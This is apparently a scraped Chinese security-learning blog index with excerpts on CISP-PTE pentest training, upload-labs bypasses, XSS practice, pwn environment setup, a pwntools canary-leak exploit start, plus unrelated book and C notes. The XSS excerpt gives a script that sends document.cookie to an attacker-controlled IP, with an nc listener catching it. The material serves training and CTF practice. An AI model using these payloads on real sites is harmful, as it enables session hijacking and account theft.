MyDaily
1b0c7c5d07d44ae53ccbcb1092d4dd01cf269ebcecead1388df37d732068ce7d2ffe14b280d8f19debfce80c1864b2195456e2a49c473c097ed8dd9fe886ae37ec6370f8113f41202985fca48013fc0129f940e04d840b24efdf3fa697bbff16e489aa35e889e802dc0d4c7fb7b88368782ccd145a9c3727916c08fe1d8c6f4a9c0a218ec4d2f658513606d22385dd85d23ead7e488636398ef361f3a2a0f47619dd80a1e85472d8add0544d58a8b5002f77e6a93e3e1df6c61d7dd9ca6273c4d3993ae9ef177de6cd707dc0bcfbef4b71d20b1eae4728fc976084f2a7272ae8eca6436326dd982761e4b12c03a44e2bac3ef65eb303d9b82 ...
CISP-PTE培训File_Upload小练
File-Upload小练upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。
项目地址:https://github.com/c0ny1/upload-labs
upload-labs所有20关的考察点。(可以借鉴为文件上传漏洞的绕过姿势)
遇见上传漏洞的分析策略:
Pass-01(前端JS检查)check:1234567891011121314151617function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg|.png|.gif"; //提取上传文件的类型 var ext_name = file.subst ...
CISP-PTE培训XSS小练
CISP-PTE培训XSS小练在CISP-PTE认证中需重点掌握内容为,窃取用户cookies
主要使用方法为:
1234567<script> document.write( '<img src="http://192.168.94.135:4000/?'+ document.cookie + '">' );</script>
通过该payload,受攻击端将cookie发送至构造好正在监听的攻击者机器对应端口
1nc.exe -l -p 4000
XSS练习平台,以https://xss.haozi.me/为例
0x00Server code:
123function render (input) { return '<div>' + input + '</div>'}
html(input输入后的变化结果):
1<div><script>alert(1);</script></div>
Input code:
1<script& ...
CISP-PTE培训简记
CISP-PTE培训简记渗透测试过程环节
前期交互
情报收集
威胁建模
在收集到充分的信息进行威胁建模与攻击策划,职责划分,确定出最可行的攻击通道
漏洞分析
找出可以实施渗透攻击的点,或者针对系统与服务进行安全漏洞探测与挖掘
渗透攻击
后渗透攻击
寻找客户组织最具价值和尝试安全保护的信息和资产,最终达成能够对客户组织造成最重要业务影响的攻击途径
报告
渗透测试的过程详细描述,以及修补与升级技术方案
信息收集信息收集的作用黑客为了更加有效地实施攻击而在攻击前或攻击过程中对目标的所有探测活动。
了解安全架构
信息收集使攻击者能够了解组织完整的安全架构
缩小攻击范围
通过IP地址范围、网络、域名、远程访问点等信息,可以缩小攻击范围
建立信息数据库
攻击者能够建立他们自己的相关目标组织安全性弱点的信息数据库来采取下一步的入侵行动
描绘网络拓扑
攻击者可以描绘出目标组织的网络拓扑图,分析最容易进入的攻击路径
信息收集的内容
网络信息
系统信息
用户和用户组名,系统表示banner,路由表,SNMP信息,系统架构,远程系统类型,系统用户名,密码等
组织信息 ...
阅读简记
《明朝那些事儿》 - 当年明月应该早些读到,更应该多读几遍。我是什么时候开始对历史故事产生兴趣的呢?我也记不清了。
《白鹿原》 - 陈忠实白鹿原的故事时间线也比较长,像是《丰乳肥臀》,读起来既有年代感,又让人品味到历史书中,在某些年代下短短一句话的情节之后,真正的底层人民百姓的生活。这一片土地养育了一代代人,见证了一个个家族乃至王朝的兴替。
大家就是大家,文字仿佛具有魔力,带你走入现场,带你亲身体会。
《平凡的世界》 - 路遥额爱秀莲。额爱晓霞。
《济公全传》 - 郭小亭对济公传产生兴趣始于郭德纲的评书单口,有趣生动的故事情节,喜欢神鬼妖魔和斗法的可以一读。
《西游记》 - 吴承恩原版书阅读和电视剧差别很大,而且原著描写实在是令我这学渣倾服,不论是环境人物还是神情动态,都是跃然纸上。完全可以作为中小学生必备读物,学习描写学习文字功底。
另一方面从情节来看,改编很大,孙悟空似乎才是取经路上的灵魂人物,不时地还要给唐长老讲道理、讲智慧。美猴王就是中国人心中最理想最浪漫的形象,人民群众也寄托了无数情感和无限遐思。
《习近平讲故事》习近平讲述《七发》中的故事,是为了说明提升修养、坚定信仰,才能 ...
C语言学习到放弃
C语言学习到放弃数据类型C 中的类型可分为以下几种:
序号
类型与描述
1
基本类型: 它们是算术类型,包括两种类型:整数类型和浮点类型。
2
枚举类型: 它们也是算术类型,被用来定义在程序中只能赋予其一定的离散整数值的变量。
3
void 类型: 类型说明符 void 表明没有可用的值。
4
派生类型: 它们包括:指针类型、数组类型、结构类型、共用体类型和函数类型。
整数类型
类型
存储大小
值范围
char
1 字节
-128 到 127 或 0 到 255
unsigned char
1 字节
0 到 255
signed char
1 字节
-128 到 127
int
2 或 4 字节
-32,768 到 32,767 或 -2,147,483,648 到 2,147,483,647
unsigned int
2 或 4 字节
0 到 65,535 或 0 到 4,294,967,295
short
2 字节
-32,768 到 32,767
unsigned short
2 字节
0 到 65,535
lon ...
pwn题如何配置和靶机一样的环境
pwn题如何配置和靶机一样的环境转载学习记录:
Nameless_a
【保姆级教程】pwn题如何配置和靶机一样的环境-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com
二进制文件+libc篇准备工作先需要安装两个工具
patchelf123456789sudo apt-get install autoconf automake libtoolgit clone https://github.com/NixOS/patchelf.gitcd patchelf./bootstrap.sh./configuremakemake checksudo make install cd ..
glibc-all-in-one1git clone https://github.com/matrix1001/glibc-all-in-one
记得下下来cd到glibc-master目录的时候先运行一下update_list,即:
1./update_list
如果发现有些时候list里面的版本下不了了,也可以用这个更新一下列表(然后你就发现绝版了)
具体操作(1)先对libc文件来 ...
从0开始的pwn题环境配置
从0开始的pwn题环境配置转载学习记录:
Nameless_a
【保姆级教程】pwn题如何配置和靶机一样的环境-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com
设置root权限密码1sudo passwd root
后面用的sudo指令需要输入的密码就是这里设定的
遇到所有的“Permission denied”的问题都是没有在root模式下
换源换国内的源能够提高我们的下载速度也能避免翻墙(如果能够翻墙的话最好),目前主要有“阿里”、“清华”和”中科大“三个源
1.阿里:
12345678910deb http://mirrors.aliyun.com/ubuntu/bionic main restricted universe multiversedeb http://mirrors.aliyun.com/ubuntu/bionic-security main restricted universe multiversedeb http://mirrors.aliyun.com/ubuntu/bionic-updates main restricted univ ...
KeepTrying
Keep Trying挖洞基础CPU的设计与实现CMU 18-447 【CMU-18-447(中英字幕)】计算机体系结构
编译器的设计与实现Stanford CS143 CS143: Compilers (stanford.edu)
操作系统的设计与实现MIT 6.828 6.828 / Fall 2018 (mit.edu)
漏洞挖掘与利用快速入门——CTFCTFs CTFs · GitHub
Wargames
pwnable.kr pwnable.kr
smashthestack.org SmashTheStack Wargaming Network
学习历史漏洞
CVES
挖掘新漏洞逆向分析+源码审计
快速逆向与代码理解
对漏洞的感觉
模糊测试
测试框架
样例生成的想法
实战—目标网络协议的实现
HTTP/SMB/DNS/UPnP Server
脚本引擎
JavaScript Engine
ActionScript Engine
PHP/Java Sandbox Escape
内核
PWN入门到入狱-Code
PWN入门到入狱-Codeleak_canary+libc12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152# -*- coding: utf-8 -*-from pwn import *from LibcSearcher import *# p=remote('node4.buuoj.cn',28688)p=process('./babystack')elf=ELF('./babystack')context.log_level='debug'#泄露canaryp.sendlineafter(">>",'1')payload='a'*(0x80+8)p.sendline(payload)p.sendlineafter('>>','2')p.recvuntil('a\n')canary=u64(p.recv(7).rjust(8,b'\x00'))log.info(hex(canary))pop_rdi=0x400a93pu ...